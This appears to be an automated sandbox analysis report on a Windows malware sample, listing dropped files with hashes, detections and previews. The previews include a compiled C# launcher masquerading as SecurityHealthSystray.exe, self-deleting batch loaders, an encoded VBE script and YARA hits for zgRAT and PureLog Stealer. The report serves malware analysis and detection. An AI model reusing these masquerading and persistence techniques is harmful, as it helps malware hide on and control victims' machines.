Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SwjJGfgwqbpLdPqvPFcqLsY.exe.log

Download File

Process:	C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Download File

Process:	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1523
Entropy (8bit):	5.373534083924954
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mC1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT41
MD5:	5E675003E8A6113031BC81EC692CFE0A
SHA1:	53FAFEED5B3E6489BDD729B50C948DD00A7CBC83
SHA-256:	5A74192EB3D5A96FA18278AD0D7B9B4D791830D7F2ED7C70B3746B0A635DF24F
SHA-512:	4F22E0ED4CF9ED3CA13DF90EC96DE2257128EFD5B67579DC822386D6233836F1EA3E11DAEB1DB36227CB5B2C595F8C296A2EB0706D356B6C86EA98A4FCC018D7
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

C:\Users\user\AppData\Local\Temp\0nIhZ6KLH4

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.643856189774723
Encrypted:	false
SSDEEP:	3:etKm09Si:UJi
MD5:	B6759520BCED9090DE43A58988BDACEB
SHA1:	0C25DB428285CEF3CC6C5779D81AACC0990370AC
SHA-256:	322EF57B8F2462B002C6CA7A01DC707104C416844A366E2CB4A8C760957F387B
SHA-512:	DB0D673F9E0B12BFF1B55E2ECCD2655AF021D6369DC72056FD65C92C65A73F2E85210E4E35FF11AB70227C12F64328A4C251F0DFD15E713B8CD64525D78A6BD0
Malicious:	false
Preview:	hvA4Q3G1niI62BjWKL7bfDwxE

C:\Users\user\AppData\Local\Temp\RES4FAE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Fri Apr 26 04:35:19 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1944
Entropy (8bit):	4.537523069183838
Encrypted:	false
SSDEEP:	24:HkC9TOXjNMHmDfHZwKGAXN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:cXjaH8iKGAXyluOulajfqXSfbNtmhBZ
MD5:	C81485EC27B792D656C745B955E604FB
SHA1:	9A23FE63F4A9C54E7D8B80146FDA6D829D443216
SHA-256:	C92A4FCD02BE1063DDD0BE3626005AD5B7097E3E0255A37EC80C3CF3659F9A17
SHA-512:	A46A803A5604F31D13EC8903D3D01C5C82D524A0C74B64FF326D0D4C979C34F41430CDECD1ED3F539206F7238C769C2276F6F1183959B515E1C7AF02DFC15581
Malicious:	false
Preview:	L..../+f.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........=....c:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES4FAE.tmp.-.<....................a..Microsoft (R) CVTRES.U.=..cwd.C:\fontrefcrt.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.

C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.0.cs

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	377
Entropy (8bit):	4.850695542778244
Encrypted:	false
SSDEEP:	6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JlOCaiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKQ
MD5:	F4E4EA8EB4441287FE30532106143DB0
SHA1:	B6F3F4E30CAA7217254AD23D1B804016CA598AC1
SHA-256:	568440F12F84D24607F4C8E5198C2DBDCA3CF2F17D557DB8F1288AC9BEA054D9
SHA-512:	DA8B21C9A1E39E4A03A96E6F3171C56E075B43D8F7041B0E05062C317CA6F60A52F242585185E3E72124204DB3317091DB318D34821BF6AFE16E8228F4C2E490
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\SystemSettings.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.066069949155806
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fgLjHWH:Hu7L//TRq79cQWfIng
MD5:	6A960C0A9658E9DBD07B6291A0F74B68
SHA1:	D9CF488C0D3E1641DA8A8847F5CC2FD4E799C6F4
SHA-256:	53939700BD05C0A6DF8945E2EF37F00BF49CF0D31939372C12A1C7AA39C2A4C5
SHA-512:	B2DD9088452EB467D58ADF4F55BAFCAA31A93729FC0C59AF7D1C5E876987F2BFF5F5B5B9E93B1C3061696BAD52849CFC9747F664C87046C0150E766DD286A6B2
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.0.cs"

C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.out

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (320), with CRLF, CR line terminators
Category:	modified
Size (bytes):	741
Entropy (8bit):	5.2408539628175745
Encrypted:	false
SSDEEP:	12:5kI/u7L//TRq79cQWfInVKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:5kI/un/Vq79tWfInVKax5DqBVKVrdFAw
MD5:	8D60D2CE513782AADF7545C504EE50A8
SHA1:	B62FBB1C4CFDE08B244F3F8B9B7031D1CD737978
SHA-256:	9CAA3E1BBA4C220BD7AA0A98A674CF8F890076A82E6B7E95E35FD1832D9D7D3C
SHA-512:	0F0610A725736B95C3C33151AADC97F374C5CFF8D39E3125CE1E0F333632DD6B7F5B6D89AB8675F13405C8C8D446536FED95AC608E765265D0C8B5737E90111B
Malicious:	false
Preview:	.C:\fontrefcrt> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\qtONc3XZ0o

Download File

Process:	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:6+UnjhjjZ:6+UdjjZ
MD5:	0070C8A0362C346B52E918E3AF285E00
SHA1:	91522CD85834EC171DDF0C0C6B19E576AE169BD5
SHA-256:	461AE4E313BC1FD4360E5876DBE482C830583339AC33AE47845493D8AB108A85
SHA-512:	14EE352A4F7E9D10CA0BB3E635B938CFB7EB21A9E1193A842DF2E909FEB3C2E3BC178D8F8CA542E5D94035B1811AE29D9EA66458C941547EFC31B682EB81A632
Malicious:	false
Preview:	dJayXIi1hO9dpDFFUAOQpGBTy

C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat

Download File

Process:	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	249
Entropy (8bit):	5.130392491898435
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5SMLvW4z7QoKOZG1wkn23fhgJ:HTg9uYDEfSM7TP3fOJ
MD5:	523A19DC7B29914AF4C0420163205B94
SHA1:	77EF28F1557C88FB21955B7AB9D2DEBC804D20BC
SHA-256:	8574E0248B6090D92EC42873D40D1361AC7B396A1A48F037E0E42FBDA50AE29F
SHA-512:	AD411110B56997659D09EA05897C960343094B9AC2769D724EF6EB02E3463113DF504194F73B3D37C707F3EBC69F406BEA9FF9D7AA99906992F2BEB5C98D72FF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\s4Al4mMfKa.bat"

C:\Users\user\AppData\Local\Temp\wNNbKC3aho.bat

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	201
Entropy (8bit):	5.155152848721863
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DER5SMLvW4z7QoKOZG1wkn23fIDYoRH:CuVEOCDEfSM7TP3fQVRH
MD5:	DD71911C6502D2C226D7EB749734CAC8
SHA1:	ED24E38B46F74362AFA275C3334A691F344A22C0
SHA-256:	35E8D28DA22D41CEF076415EE0D5F5276C2E6DB15249EF64563AA97482D0F2E6
SHA-512:	7C0142181DC80ED82C1EE6D7536EA6D74CD7BE4765A8A78E1A55971D829C862CAA4BBAE2F55B7D0F4C1F30AB211CD871A1E2B00E78674CC07EA9822582EE78DB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\wNNbKC3aho.bat"

C:\Users\user\Desktop\iJCvyQAH.log

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 25%, Browse
Joe Sandbox View:	Filename: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, Detection: malicious, Browse Filename: hfGA6tjyxY.exe, Detection: malicious, Browse Filename: 3m7cmtctck.exe, Detection: malicious, Browse Filename: jXtV6KO1A7.exe, Detection: malicious, Browse Filename: fDTPlvsGfH.exe, Detection: malicious, Browse Filename: W4tW72sfAD.exe, Detection: malicious, Browse Filename: 8CDSiIApNr.exe, Detection: malicious, Browse Filename: 3otr19d5Oq.exe, Detection: malicious, Browse Filename: idYLOQOVSi.exe, Detection: malicious, Browse Filename: ZAF4Dsu737.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wNZUMzpS.log

Download File

Process:	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 25%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9230722935069045
Encrypted:	false
SSDEEP:	48:6uJTPt+M7Jt8Bs3FJsdcV4MKe27SvqBH2OulajfqXSfbNtm:BPdPc+Vx9MSvkQcjRzNt
MD5:	6BE8E767DF9FC6CBB9AD6020F43C3094
SHA1:	DC1611A451A62A0F6BFB0D0C0E3F193E5BA79074
SHA-256:	CF000183EFE52B7EE613EE309CA06AEDAAB9726A78D72F6C784BBAF6E11A666A
SHA-512:	89E945595C864869CE56A02D1739B6ADB4296FC1134EB3D187AA6738C97D0AF6550BA767CBFAF710BCC8CFB839F6C6436CB317498F7EF8E72D9F4619C4E29AB9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../+f.............................'... ...@....@.. ....................................@.................................4'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\fontrefcrt\18c91701d3e601

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	ASCII text, with very long lines (996), with no line terminators
Category:	dropped
Size (bytes):	996
Entropy (8bit):	5.912489225219911
Encrypted:	false
SSDEEP:	24:OBQezFE5fOlegbcwULA8PVlN+xSdWQll1mMOk:OBfOxOlrmBVlUI/lJOk
MD5:	F6A96D952FB0A48C23C2EAE39ECE0F31
SHA1:	9B390D5B481B4E8C537D4159173446D5ACE1895E
SHA-256:	22CB25770E1AD34039939747B54ADED0790C95EEB00AFDF7F260ADC409CC75B3
SHA-512:	B94D64EEFA74A04F47CB7063AF8B45B1E41E9A5CA3CB2E76DDE5984848EC72F84FDF742E0300FBBEBB37C339CDD284662B4199041DF69D3BA52CEB148C86705C
Malicious:	false
Preview:	ZyNGA5Vg455B51ur5UZBMbat1iStKL5284CWxqMEPA9M3Gj40o74Awx7XdOcnmWtADDByY4PHUwLcO0v9X3fOA1LGE8TcubnnQL0CiFburwpAlfJnccPs0eAL24uakxX3IhMCAsbRbvhNMKejyq9RL4xvLoKnVBJ3Zv2ETHntB7RE7w9raKl4yFsNua0Vhx6ZmnxaSaQrCPPOmsxZpdNLaOFUDoT2QSLOB2cU8iY9332izdkBmbpEku9XhdXnGYauDBNuQdaHENRgWgfjDSPzmHoQ3FwfKv3fcIexQ0vJAi9WdcAB7xjyIlH6X61Lq46TTvDOBrSNgGzEHRwaEviXLFX1AiaU8kcFlqCsZw9PeVRBwCyGJaG5WjIOYLNdR8O6ntdbOEBSwS2zyVF8uTKidhsChyTNig7gGUYCjW1FZxIDrSaCGPs7yqcGAa4auyuQVVsd7CYYcEIpYoVOYQHSx9ra1RCIcbUlD2sVk6FD1UfthwrVFpCdrbcVoSmpAP5Buhmg69obLDbce82EjqDwZ04mZXrSUaDlYe99KLZFBkSn9A1qZhFTMIl3n9GiSVHv9zE9824YR7vyiQmZgB2xUtYP2FWLF0xpchnJ51rhnrCPXxVXXrCRdUbPbyH3gsTaJGVAmcdoTUJmrJ2Ft8yXyfLIGXsHtyB4YlFQbUv4NX7IKyiR5CJh45mn5N4OtW4fTPOGDmoZN3KaiD7RzaLrod9d9bVNZgL1cby5kcOTXtUBvLF1PnYSKN10PuGlRa9qsS7GOCrXM2T4I8sxWd7wI2rPk8pzVmC7uoTcN9nN5BGR36rRCTPxdMhzlsfPW1Cj0WKeoPjX0t0GwZWoRYwBXOehGe1fdX1E9gbgvMnxt27tWbCLV188EAMl2mYKXE4c2wHQ8z2Ev9SfRuLpbqJlZ299T0nIycZp7f0kTwNf83NFrrUIbstr4SDAwI6HLtQSkmhw3lVocnmfp4RmgfrFtrvpc0xK0FTPn4e

C:\fontrefcrt\24dbde2999530e

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	3.546593564294939
Encrypted:	false
SSDEEP:	3:MrjySow:M/ySD
MD5:	5C3B613F95D7EAF20988493429BFE098
SHA1:	F9B649FFE9F41EB4740272CD8D3FD4157D07391B
SHA-256:	D30EAFCC5C91142B03B0968433E20E54017E11A45EE850BD651F4F4112F9B36E
SHA-512:	2A1ACD18369510C36BD353EEA9A9E7E10A4D177D622C424F4C0E9F947F8D3806DF8DD8866F98918BD566EEC822D061F1F9DECF985A576C0E464270FBF71CBB2D
Malicious:	false
Preview:	ZDGmsznWwF1sR

C:\fontrefcrt\JfSdr.vbe

Download File

Process:	C:\Users\user\Desktop\yX8787W7de.exe
File Type:	data
Category:	dropped
Size (bytes):	233
Entropy (8bit):	5.897214179368768
Encrypted:	false
SSDEEP:	6:GlwqK+NkLzWbHprFnBaORbM5nC2dd/Mgoi+JVBUU8s:GoMCzWLphBaORbQC2dVMgoT9D
MD5:	51DD9E9DC66C159A08E01EEBFA40550C
SHA1:	FA1B5EFB7FD8CE172207B10B535F81C9464ADBD0
SHA-256:	8B07B84BCC35BE88AE179F7D255958B23CD18CC22793B224AB41B1001597539C
SHA-512:	DDA3A17BFDFBECE5312B7D515D1DE4BEC2DBD62305E4CBBBC1AEE27A948BB957218D556B908AAD6D971569D66DB1B11EBDBD2321239B7BBA0E3008BD0D7345DF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^0AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v T!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ@#@&q/4j4+Vs "EUPr/=zWKxDD+6mMOzJ5K:2IrT.EMUA!9mz1\rkZjo]/8O;2%(qVh$j#95jv3ac4CYrS,!S,0mV/.NUIAAA==^#~@.

C:\fontrefcrt\MsintoRefcommonsvc.exe

Download File

Process:	C:\Users\user\Desktop\yX8787W7de.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1689088
Entropy (8bit):	7.442451366206663
Encrypted:	false
SSDEEP:	24576:yscKze7Cuj+1u6YVz+AOJCxYdSxb5MNi4mJy57SPw3eKS+JE204XH+zheSO6vfqU:H6n+0YdQ+iylSI3DE2o7OO
MD5:	65F6B916C8BD52DDAD601807F96BC373
SHA1:	F02DC96FDCFA8F9F15A6DA9F333516E17429693C
SHA-256:	A63B87ED58BED0EC8EACD16F57045A25A05D03BFC6A0B4957F45C76997BEC0D8
SHA-512:	0DD14259265F466576FB8DF29E9ABB4F5DB97EA8A48A8F6AEE5F2C75AE7A0EEBB96EC828C755B901B5DAB79A9B3ADC1F5151D0C7DD407F36ECB6C7AA8D2868A7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontrefcrt\MsintoRefcommonsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontrefcrt\MsintoRefcommonsvc.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 74%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H..............................l........................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{c...9....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..)....... ........8........E........N...)...............8....8.... ....~....{{...9....& ....8.......... ....~....{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8_...r...ps....z~....:.... ....~....{....95...& ....8.......~....(P.

C:\fontrefcrt\WmiPrvSE.exe

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1689088
Entropy (8bit):	7.442451366206663
Encrypted:	false
SSDEEP:	24576:yscKze7Cuj+1u6YVz+AOJCxYdSxb5MNi4mJy57SPw3eKS+JE204XH+zheSO6vfqU:H6n+0YdQ+iylSI3DE2o7OO
MD5:	65F6B916C8BD52DDAD601807F96BC373
SHA1:	F02DC96FDCFA8F9F15A6DA9F333516E17429693C
SHA-256:	A63B87ED58BED0EC8EACD16F57045A25A05D03BFC6A0B4957F45C76997BEC0D8
